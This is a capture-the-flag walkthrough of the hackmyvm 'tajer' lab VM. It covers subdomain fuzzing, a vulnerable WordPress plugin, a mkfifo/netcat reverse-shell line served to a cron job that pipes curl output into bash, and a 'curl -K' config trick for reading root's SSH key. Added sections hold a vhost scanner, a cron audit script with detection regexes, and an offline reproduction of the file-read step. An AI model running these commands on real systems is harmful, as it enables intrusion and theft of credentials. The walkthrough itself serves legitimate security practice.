The free CTF challenge site hackmyvm.eu has another medium-level vm called ‘tajer’ for us to download, enumerate and grab some flags from. In this write-up I will try to describe my method and thought process for how I (barely) completed the hackmyvm ‘tajer’ CTF challenge.
Setup
The tajer vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.
My network:
- 192.168.186.150 – This is my BlackArch enumeration system.
- 192.168.186.12 – This is the tajer vm.
For enumeration of the hackmyvm tajer challenge I will be using the BlackArch system build that I created in a previous blog post. You can use Kali, BlackArch, Parrot or just a standard Linux install to follow along. You will also need the pspy64 binary, which gets copied onto the target once we have a shell.
Video
I recorded my walk-through session. Not much talking, but maybe it makes things a bit clearer.
Enumeration
Some rooms are just hard to get started on, and this is one of them; I really struggled with the first step. There was a clue in the name: if you google “Tajer exploit” you get results pointing to a serious bug in the Tajer plugin for WordPress. It is also worth knowing that the vms on hackmyvm.eu tend to use a .hmv domain suffix.
nmap
nmap -p- 192.168.186.12
The Nmap results show only two services: ssh and http.
A quick look at the page showed up little of use.
Fuzzing
This was the hardest part of the room. Gobuster, dirb and nmap turned up nothing useful. After a hint I looked into virtual-host (subdomain) fuzzing: the web server can serve a different site depending on the Host header, so a name that no DNS server will resolve for you can still be found by sending candidate Host values straight to the IP. After a lot of fuzzing I arrived at the command below. The .hmv suffix is popular with the vms on the hackmyvm website.
wfuzz -c -w /opt/directory-list-2.3-medium.txt -u http://tajer.FUZZ.hmv --ip 192.168.186.12 --hl=25
The hit is “wordpress”, so the next step is to add an entry to my local /etc/hosts file to match it:
192.168.186.12 tajer.wordpress.hmv
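As an added example (not part of the original write-up), the same virtual-host scan done by hand with curl, which shows what wfuzz is doing: pin each candidate name to the target IP with --resolve, request the root page, and keep only the names whose response differs from what the server returns for a name it does not know. The hostname pattern, port 80 and the wordlist path are assumptions taken from the command above.

```bash
#!/usr/bin/env bash
# Added example, not from the original write-up: manual virtual-host discovery
# equivalent to the wfuzz command. Assumptions: HTTP on port 80 at the target
# IP; the "tajer.<word>.hmv" pattern and the wordlist path come from the post.

# Request one candidate name and print "<name> <http_status> <body_length>".
# --resolve pins the name to the IP, so no DNS record or /etc/hosts entry is needed.
probe_vhost() {
    local ip="$1" name="$2" out status body
    # -w appends the status code on its own line after the body.
    out=$(curl -s -m 5 -w '\n%{http_code}' --resolve "${name}:80:${ip}" "http://${name}/") || return 1
    status=${out##*$'\n'}
    body=${out%$'\n'*}
    printf '%s %s %s\n' "$name" "$status" "${#body}"
}

# Keep only the names whose body length differs from the baseline (the length
# the server returns for an unknown name). wfuzz --hl=25 does the same thing
# by line count; length is used here because a single probe gives it directly.
filter_vhosts() {
    local baseline="$1"
    awk -v base="$baseline" '$3 != base { print $1 }'
}

# Full scan: measure the baseline with a name that cannot exist, then probe
# every word in the list at the fuzz position and report the outliers.
scan_vhosts() {
    local ip="$1" prefix="$2" suffix="$3" wordlist="$4" baseline w
    baseline=$(probe_vhost "$ip" "nonexistent-$$${suffix}" | awk '{ print $3 }')
    while IFS= read -r w; do
        [ -n "$w" ] && probe_vhost "$ip" "${prefix}${w}${suffix}"
    done < "$wordlist" | filter_vhosts "$baseline"
}

# Usage matching the write-up (hypothetical wordlist path):
#   scan_vhosts 192.168.186.12 tajer. .hmv /opt/directory-list-2.3-medium.txt
```

Whatever scan_vhosts prints is a Host value the server treats specially; confirm each one manually with `curl --resolve` before adding it to /etc/hosts, since a size difference can also come from rate limiting or an error page.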
Tajer
So we have a WordPress site. I ran the wpscan utility to enumerate it and found that it runs the vulnerable Tajer plugin.
wpscan --url http://tajer.wordpress.hmv --api-token=<api-token>
wpscan needs an API token to report vulnerability data, but you can get one for free on their website.
Follow the linked exploit method to upload a PHP reverse shell script.
More Enumeration
The user we have at the moment is not much use, so we have to enumerate further and move to a more useful user.
pspy64
Copy over and run pspy64; it reveals an “interesting” cron job running every minute.
Cron
/usr/bin/bash -c /usr/bin/bash < <(/usr/bin/curl -s http://password.wordpress.hmv/k3vin)
So this runs /usr/bin/bash on the output of the command
/usr/bin/curl -s http://password.wordpress.hmv/k3vin
In other words, whatever that URL returns is executed as the cron user, every minute, over plain HTTP with no integrity check. Whoever controls the name password.wordpress.hmv controls the job.
DNS
However, there is no DNS record for password.wordpress.hmv, so I had to create one on my local DNS server pointing password.wordpress.hmv at the IP address of my enumeration system (192.168.186.150). The tajer vm gets its DNS server from my network's DHCP when it boots, so it picks the record up. Once that is sorted, the next step is to run a Python web server on port 80 of the enumeration system.
But first I have to create a file called k3vin that spawns a reverse shell. Although the target is a WordPress site, this is not PHP: the cron job feeds the fetched bytes straight into bash, so the file is a plain shell one-liner:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.186.150 1235 >/tmp/f
Then, on your enumeration host, have a netcat listener running:
nc -vnlp 1235
All going well, in less than 60 seconds this spawns a shell as the user “kevin” and you can read user.txt.
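The cron job above is an instance of a well-known anti-pattern: a scheduled task that fetches content from the network and hands it to a shell. As an added example (not from the original write-up), here is a small audit script that flags that shape in crontab text, in its pipe, process-substitution and command-substitution forms. The sample crontab is constructed for the demo; only the tajer line is modelled on the page.

```bash
#!/usr/bin/env bash
# Added example, not from the original write-up: audit cron entries that fetch
# something over the network and execute it. The sample crontab is constructed.

# ERE covering the three common shapes:
#   1. curl/wget ... | sh|bash|dash|zsh
#   2. bash < <(curl ...)         (process substitution, as in the tajer cron)
#   3. sh -c "$(curl ...)"        (command substitution fed to a shell)
FETCH_EXEC_RE='(curl|wget)[^|]*\|[[:space:]]*(/[^[:space:]]*/)?(ba|da|z)?sh([[:space:]]|$)'
FETCH_EXEC_RE="$FETCH_EXEC_RE"'|(ba)?sh[^<]*<[[:space:]]*<\([[:space:]]*(/[^[:space:]]*/)?(curl|wget)'
FETCH_EXEC_RE="$FETCH_EXEC_RE"'|sh[[:space:]]+-c[[:space:]]+.?\$\([[:space:]]*(/[^[:space:]]*/)?(curl|wget)'

# Read crontab text on stdin and print the matching lines, skipping comments
# and blanks. Exit status is 0 either way so callers can simply count output.
audit_fetch_exec() {
    grep -vE '^[[:space:]]*(#|$)' | grep -E "$FETCH_EXEC_RE" || true
}

# Walk the usual cron locations on this host and print "<file>: <line>" for
# each hit. Paths that do not exist or are not readable are skipped.
audit_system_cron() {
    local f
    for f in /etc/crontab /etc/cron.d/* /etc/anacrontab \
             /var/spool/cron/* /var/spool/cron/crontabs/*; do
        [ -f "$f" ] && [ -r "$f" ] || continue
        audit_fetch_exec < "$f" | sed "s|^|$f: |"
    done
}

# Constructed sample: the tajer-style job, a pipe-to-sh installer, and two
# benign entries that merely call run-parts or download a file without running it.
SAMPLE_CRONTAB='# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * kevin /usr/bin/bash -c /usr/bin/bash < <(/usr/bin/curl -s http://password.wordpress.hmv/k3vin)
*/5 * * * * root /usr/bin/curl -s https://updates.example/install.sh | /bin/sh
0 3 * * * backup /usr/bin/curl -s -o /var/backups/list.txt https://example.invalid/list'

# Run the audit over the sample: prints the two fetch-and-execute lines only.
demo_audit() {
    printf '%s\n' "$SAMPLE_CRONTAB" | audit_fetch_exec
}
```

Run `audit_system_cron` as root on a host you are assessing; on the tajer box the kevin entry would be the single hit. A download that is saved to disk and verified before use (the backup line) is deliberately not flagged, since the problem is execution of unverified bytes, not curl itself.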
Again with the Enumeration
If you still have pspy64 running, leave it running. Otherwise start it up and keep it somewhere you can see it.
Interesting Files
Eventually you will find the /opt/scripts and /opt/kevin directories. The former is the more interesting, as the latter is empty. It holds two files: curl.py, which we cannot read, and code, which is compiled Python.
The tajer host does not have strings installed, so I copied the code file back to my enumeration system and ran strings against it there.
Strings on Code
The only thing I found of interest was the string “/opt/kevin/input.txt”. That file does not exist yet.
What happens if we create it with some text?
echo abcd >/opt/kevin/input.txt
pspy64 again
In the window with pspy64 running, a new command pops up:
/bin/sh -c [ -f /opt/kevin/input.txt ] && /opt/scripts/curl.py sh -c /bin/bash -c 'curl -o /tmp/result_18_38_01 -K abcd'
So the logic is something like: if /opt/kevin/input.txt exists, run /opt/scripts/curl.py with the file's contents as an argument.
curl.py in turn runs
sh -c /bin/bash -c 'curl -o /tmp/result_18_38_01 -K abcd'
Note that “abcd”, the text we wrote into input.txt, has become the argument to curl's -K option.
curl
This is interesting: it is a curl command run with the -K option, which tells curl to read its options from a config file at the given path. Whatever we write into /opt/kevin/input.txt becomes that config file path, and curl saves whatever it fetches to /tmp/result_<time>. A curl config file can set the URL, and curl accepts file:// URLs, so a config we control makes the job read any local file its user can open and leave a copy in /tmp for us. Since the result below contains root's key, the job evidently runs as root.
So if we put the following curl config in the file /tmp/abcd
url = file:///root/.ssh/id_pub
and in the file /opt/kevin/input.txt we put the path to that config
/tmp/abcd
then on the job's next run a /tmp/result_* file appears containing root's key. With that you can do what you want.
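As an added example (not from the original write-up), the following reproduces the -K abuse end to end in a scratch directory, so you can see exactly what the privileged job does with the two files before arming it on a target. All paths are arguments rather than the /opt/kevin and /tmp locations from the box, and the “secret” file is a constructed stand-in for root's key; the simulate_job function is my model of what pspy showed curl.py running, not the script's own code.

```bash
#!/usr/bin/env bash
# Added example, not from the original write-up: offline reproduction of the
# curl -K file-read primitive. Paths are arguments so it runs in a scratch
# directory; the secret file stands in for /root/.ssh/id_pub.

# Write a curl config that makes "curl -K <cfg>" fetch a local file via file://.
# The job already supplies -o /tmp/result_<time>, so that is where the bytes go.
write_curl_config() {
    local cfg="$1" target_file="$2"
    printf 'url = "file://%s"\n' "$target_file" > "$cfg"
}

# Drop the trigger the cron job checks for. Its content is passed verbatim as
# the -K argument, so it must be the absolute path of the config above.
arm_trigger() {
    local input_txt="$1" cfg="$2"
    printf '%s\n' "$cfg" > "$input_txt"
}

# Model of what the privileged job does (from the pspy output):
#   curl -o <result> -K <contents of input.txt>
# Prints what curl wrote to the result file, i.e. the target file's contents.
simulate_job() {
    local input_txt="$1" result="$2" cfg
    cfg=$(cat "$input_txt")
    curl -s -o "$result" -K "$cfg" || return 1
    cat "$result"
}

# End-to-end demo in a temp dir: plant a fake secret, build the config and
# trigger, run the job model, print the recovered secret, clean up.
demo() {
    local dir
    dir=$(mktemp -d)
    printf 'FAKE-ROOT-KEY\n' > "$dir/secret"      # constructed stand-in
    write_curl_config "$dir/abcd" "$dir/secret"
    arm_trigger "$dir/input.txt" "$dir/abcd"
    simulate_job "$dir/input.txt" "$dir/result"
    rm -rf "$dir"
}
```

Two caveats worth knowing before relying on this on a real target: the trigger must hold an absolute path (the job runs with an unknown working directory, which is why the bare “abcd” in the pspy output did nothing useful), and a curl config file also accepts `output = <path>`, so a privileged `curl -K` over attacker-controlled config is a file-write primitive as well as a file-read one; the write-up only needs the read.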
Wrap up
Not sure if I had fun or nearly lost my mind. I am a bit numb after this one. Any comments, leave them below.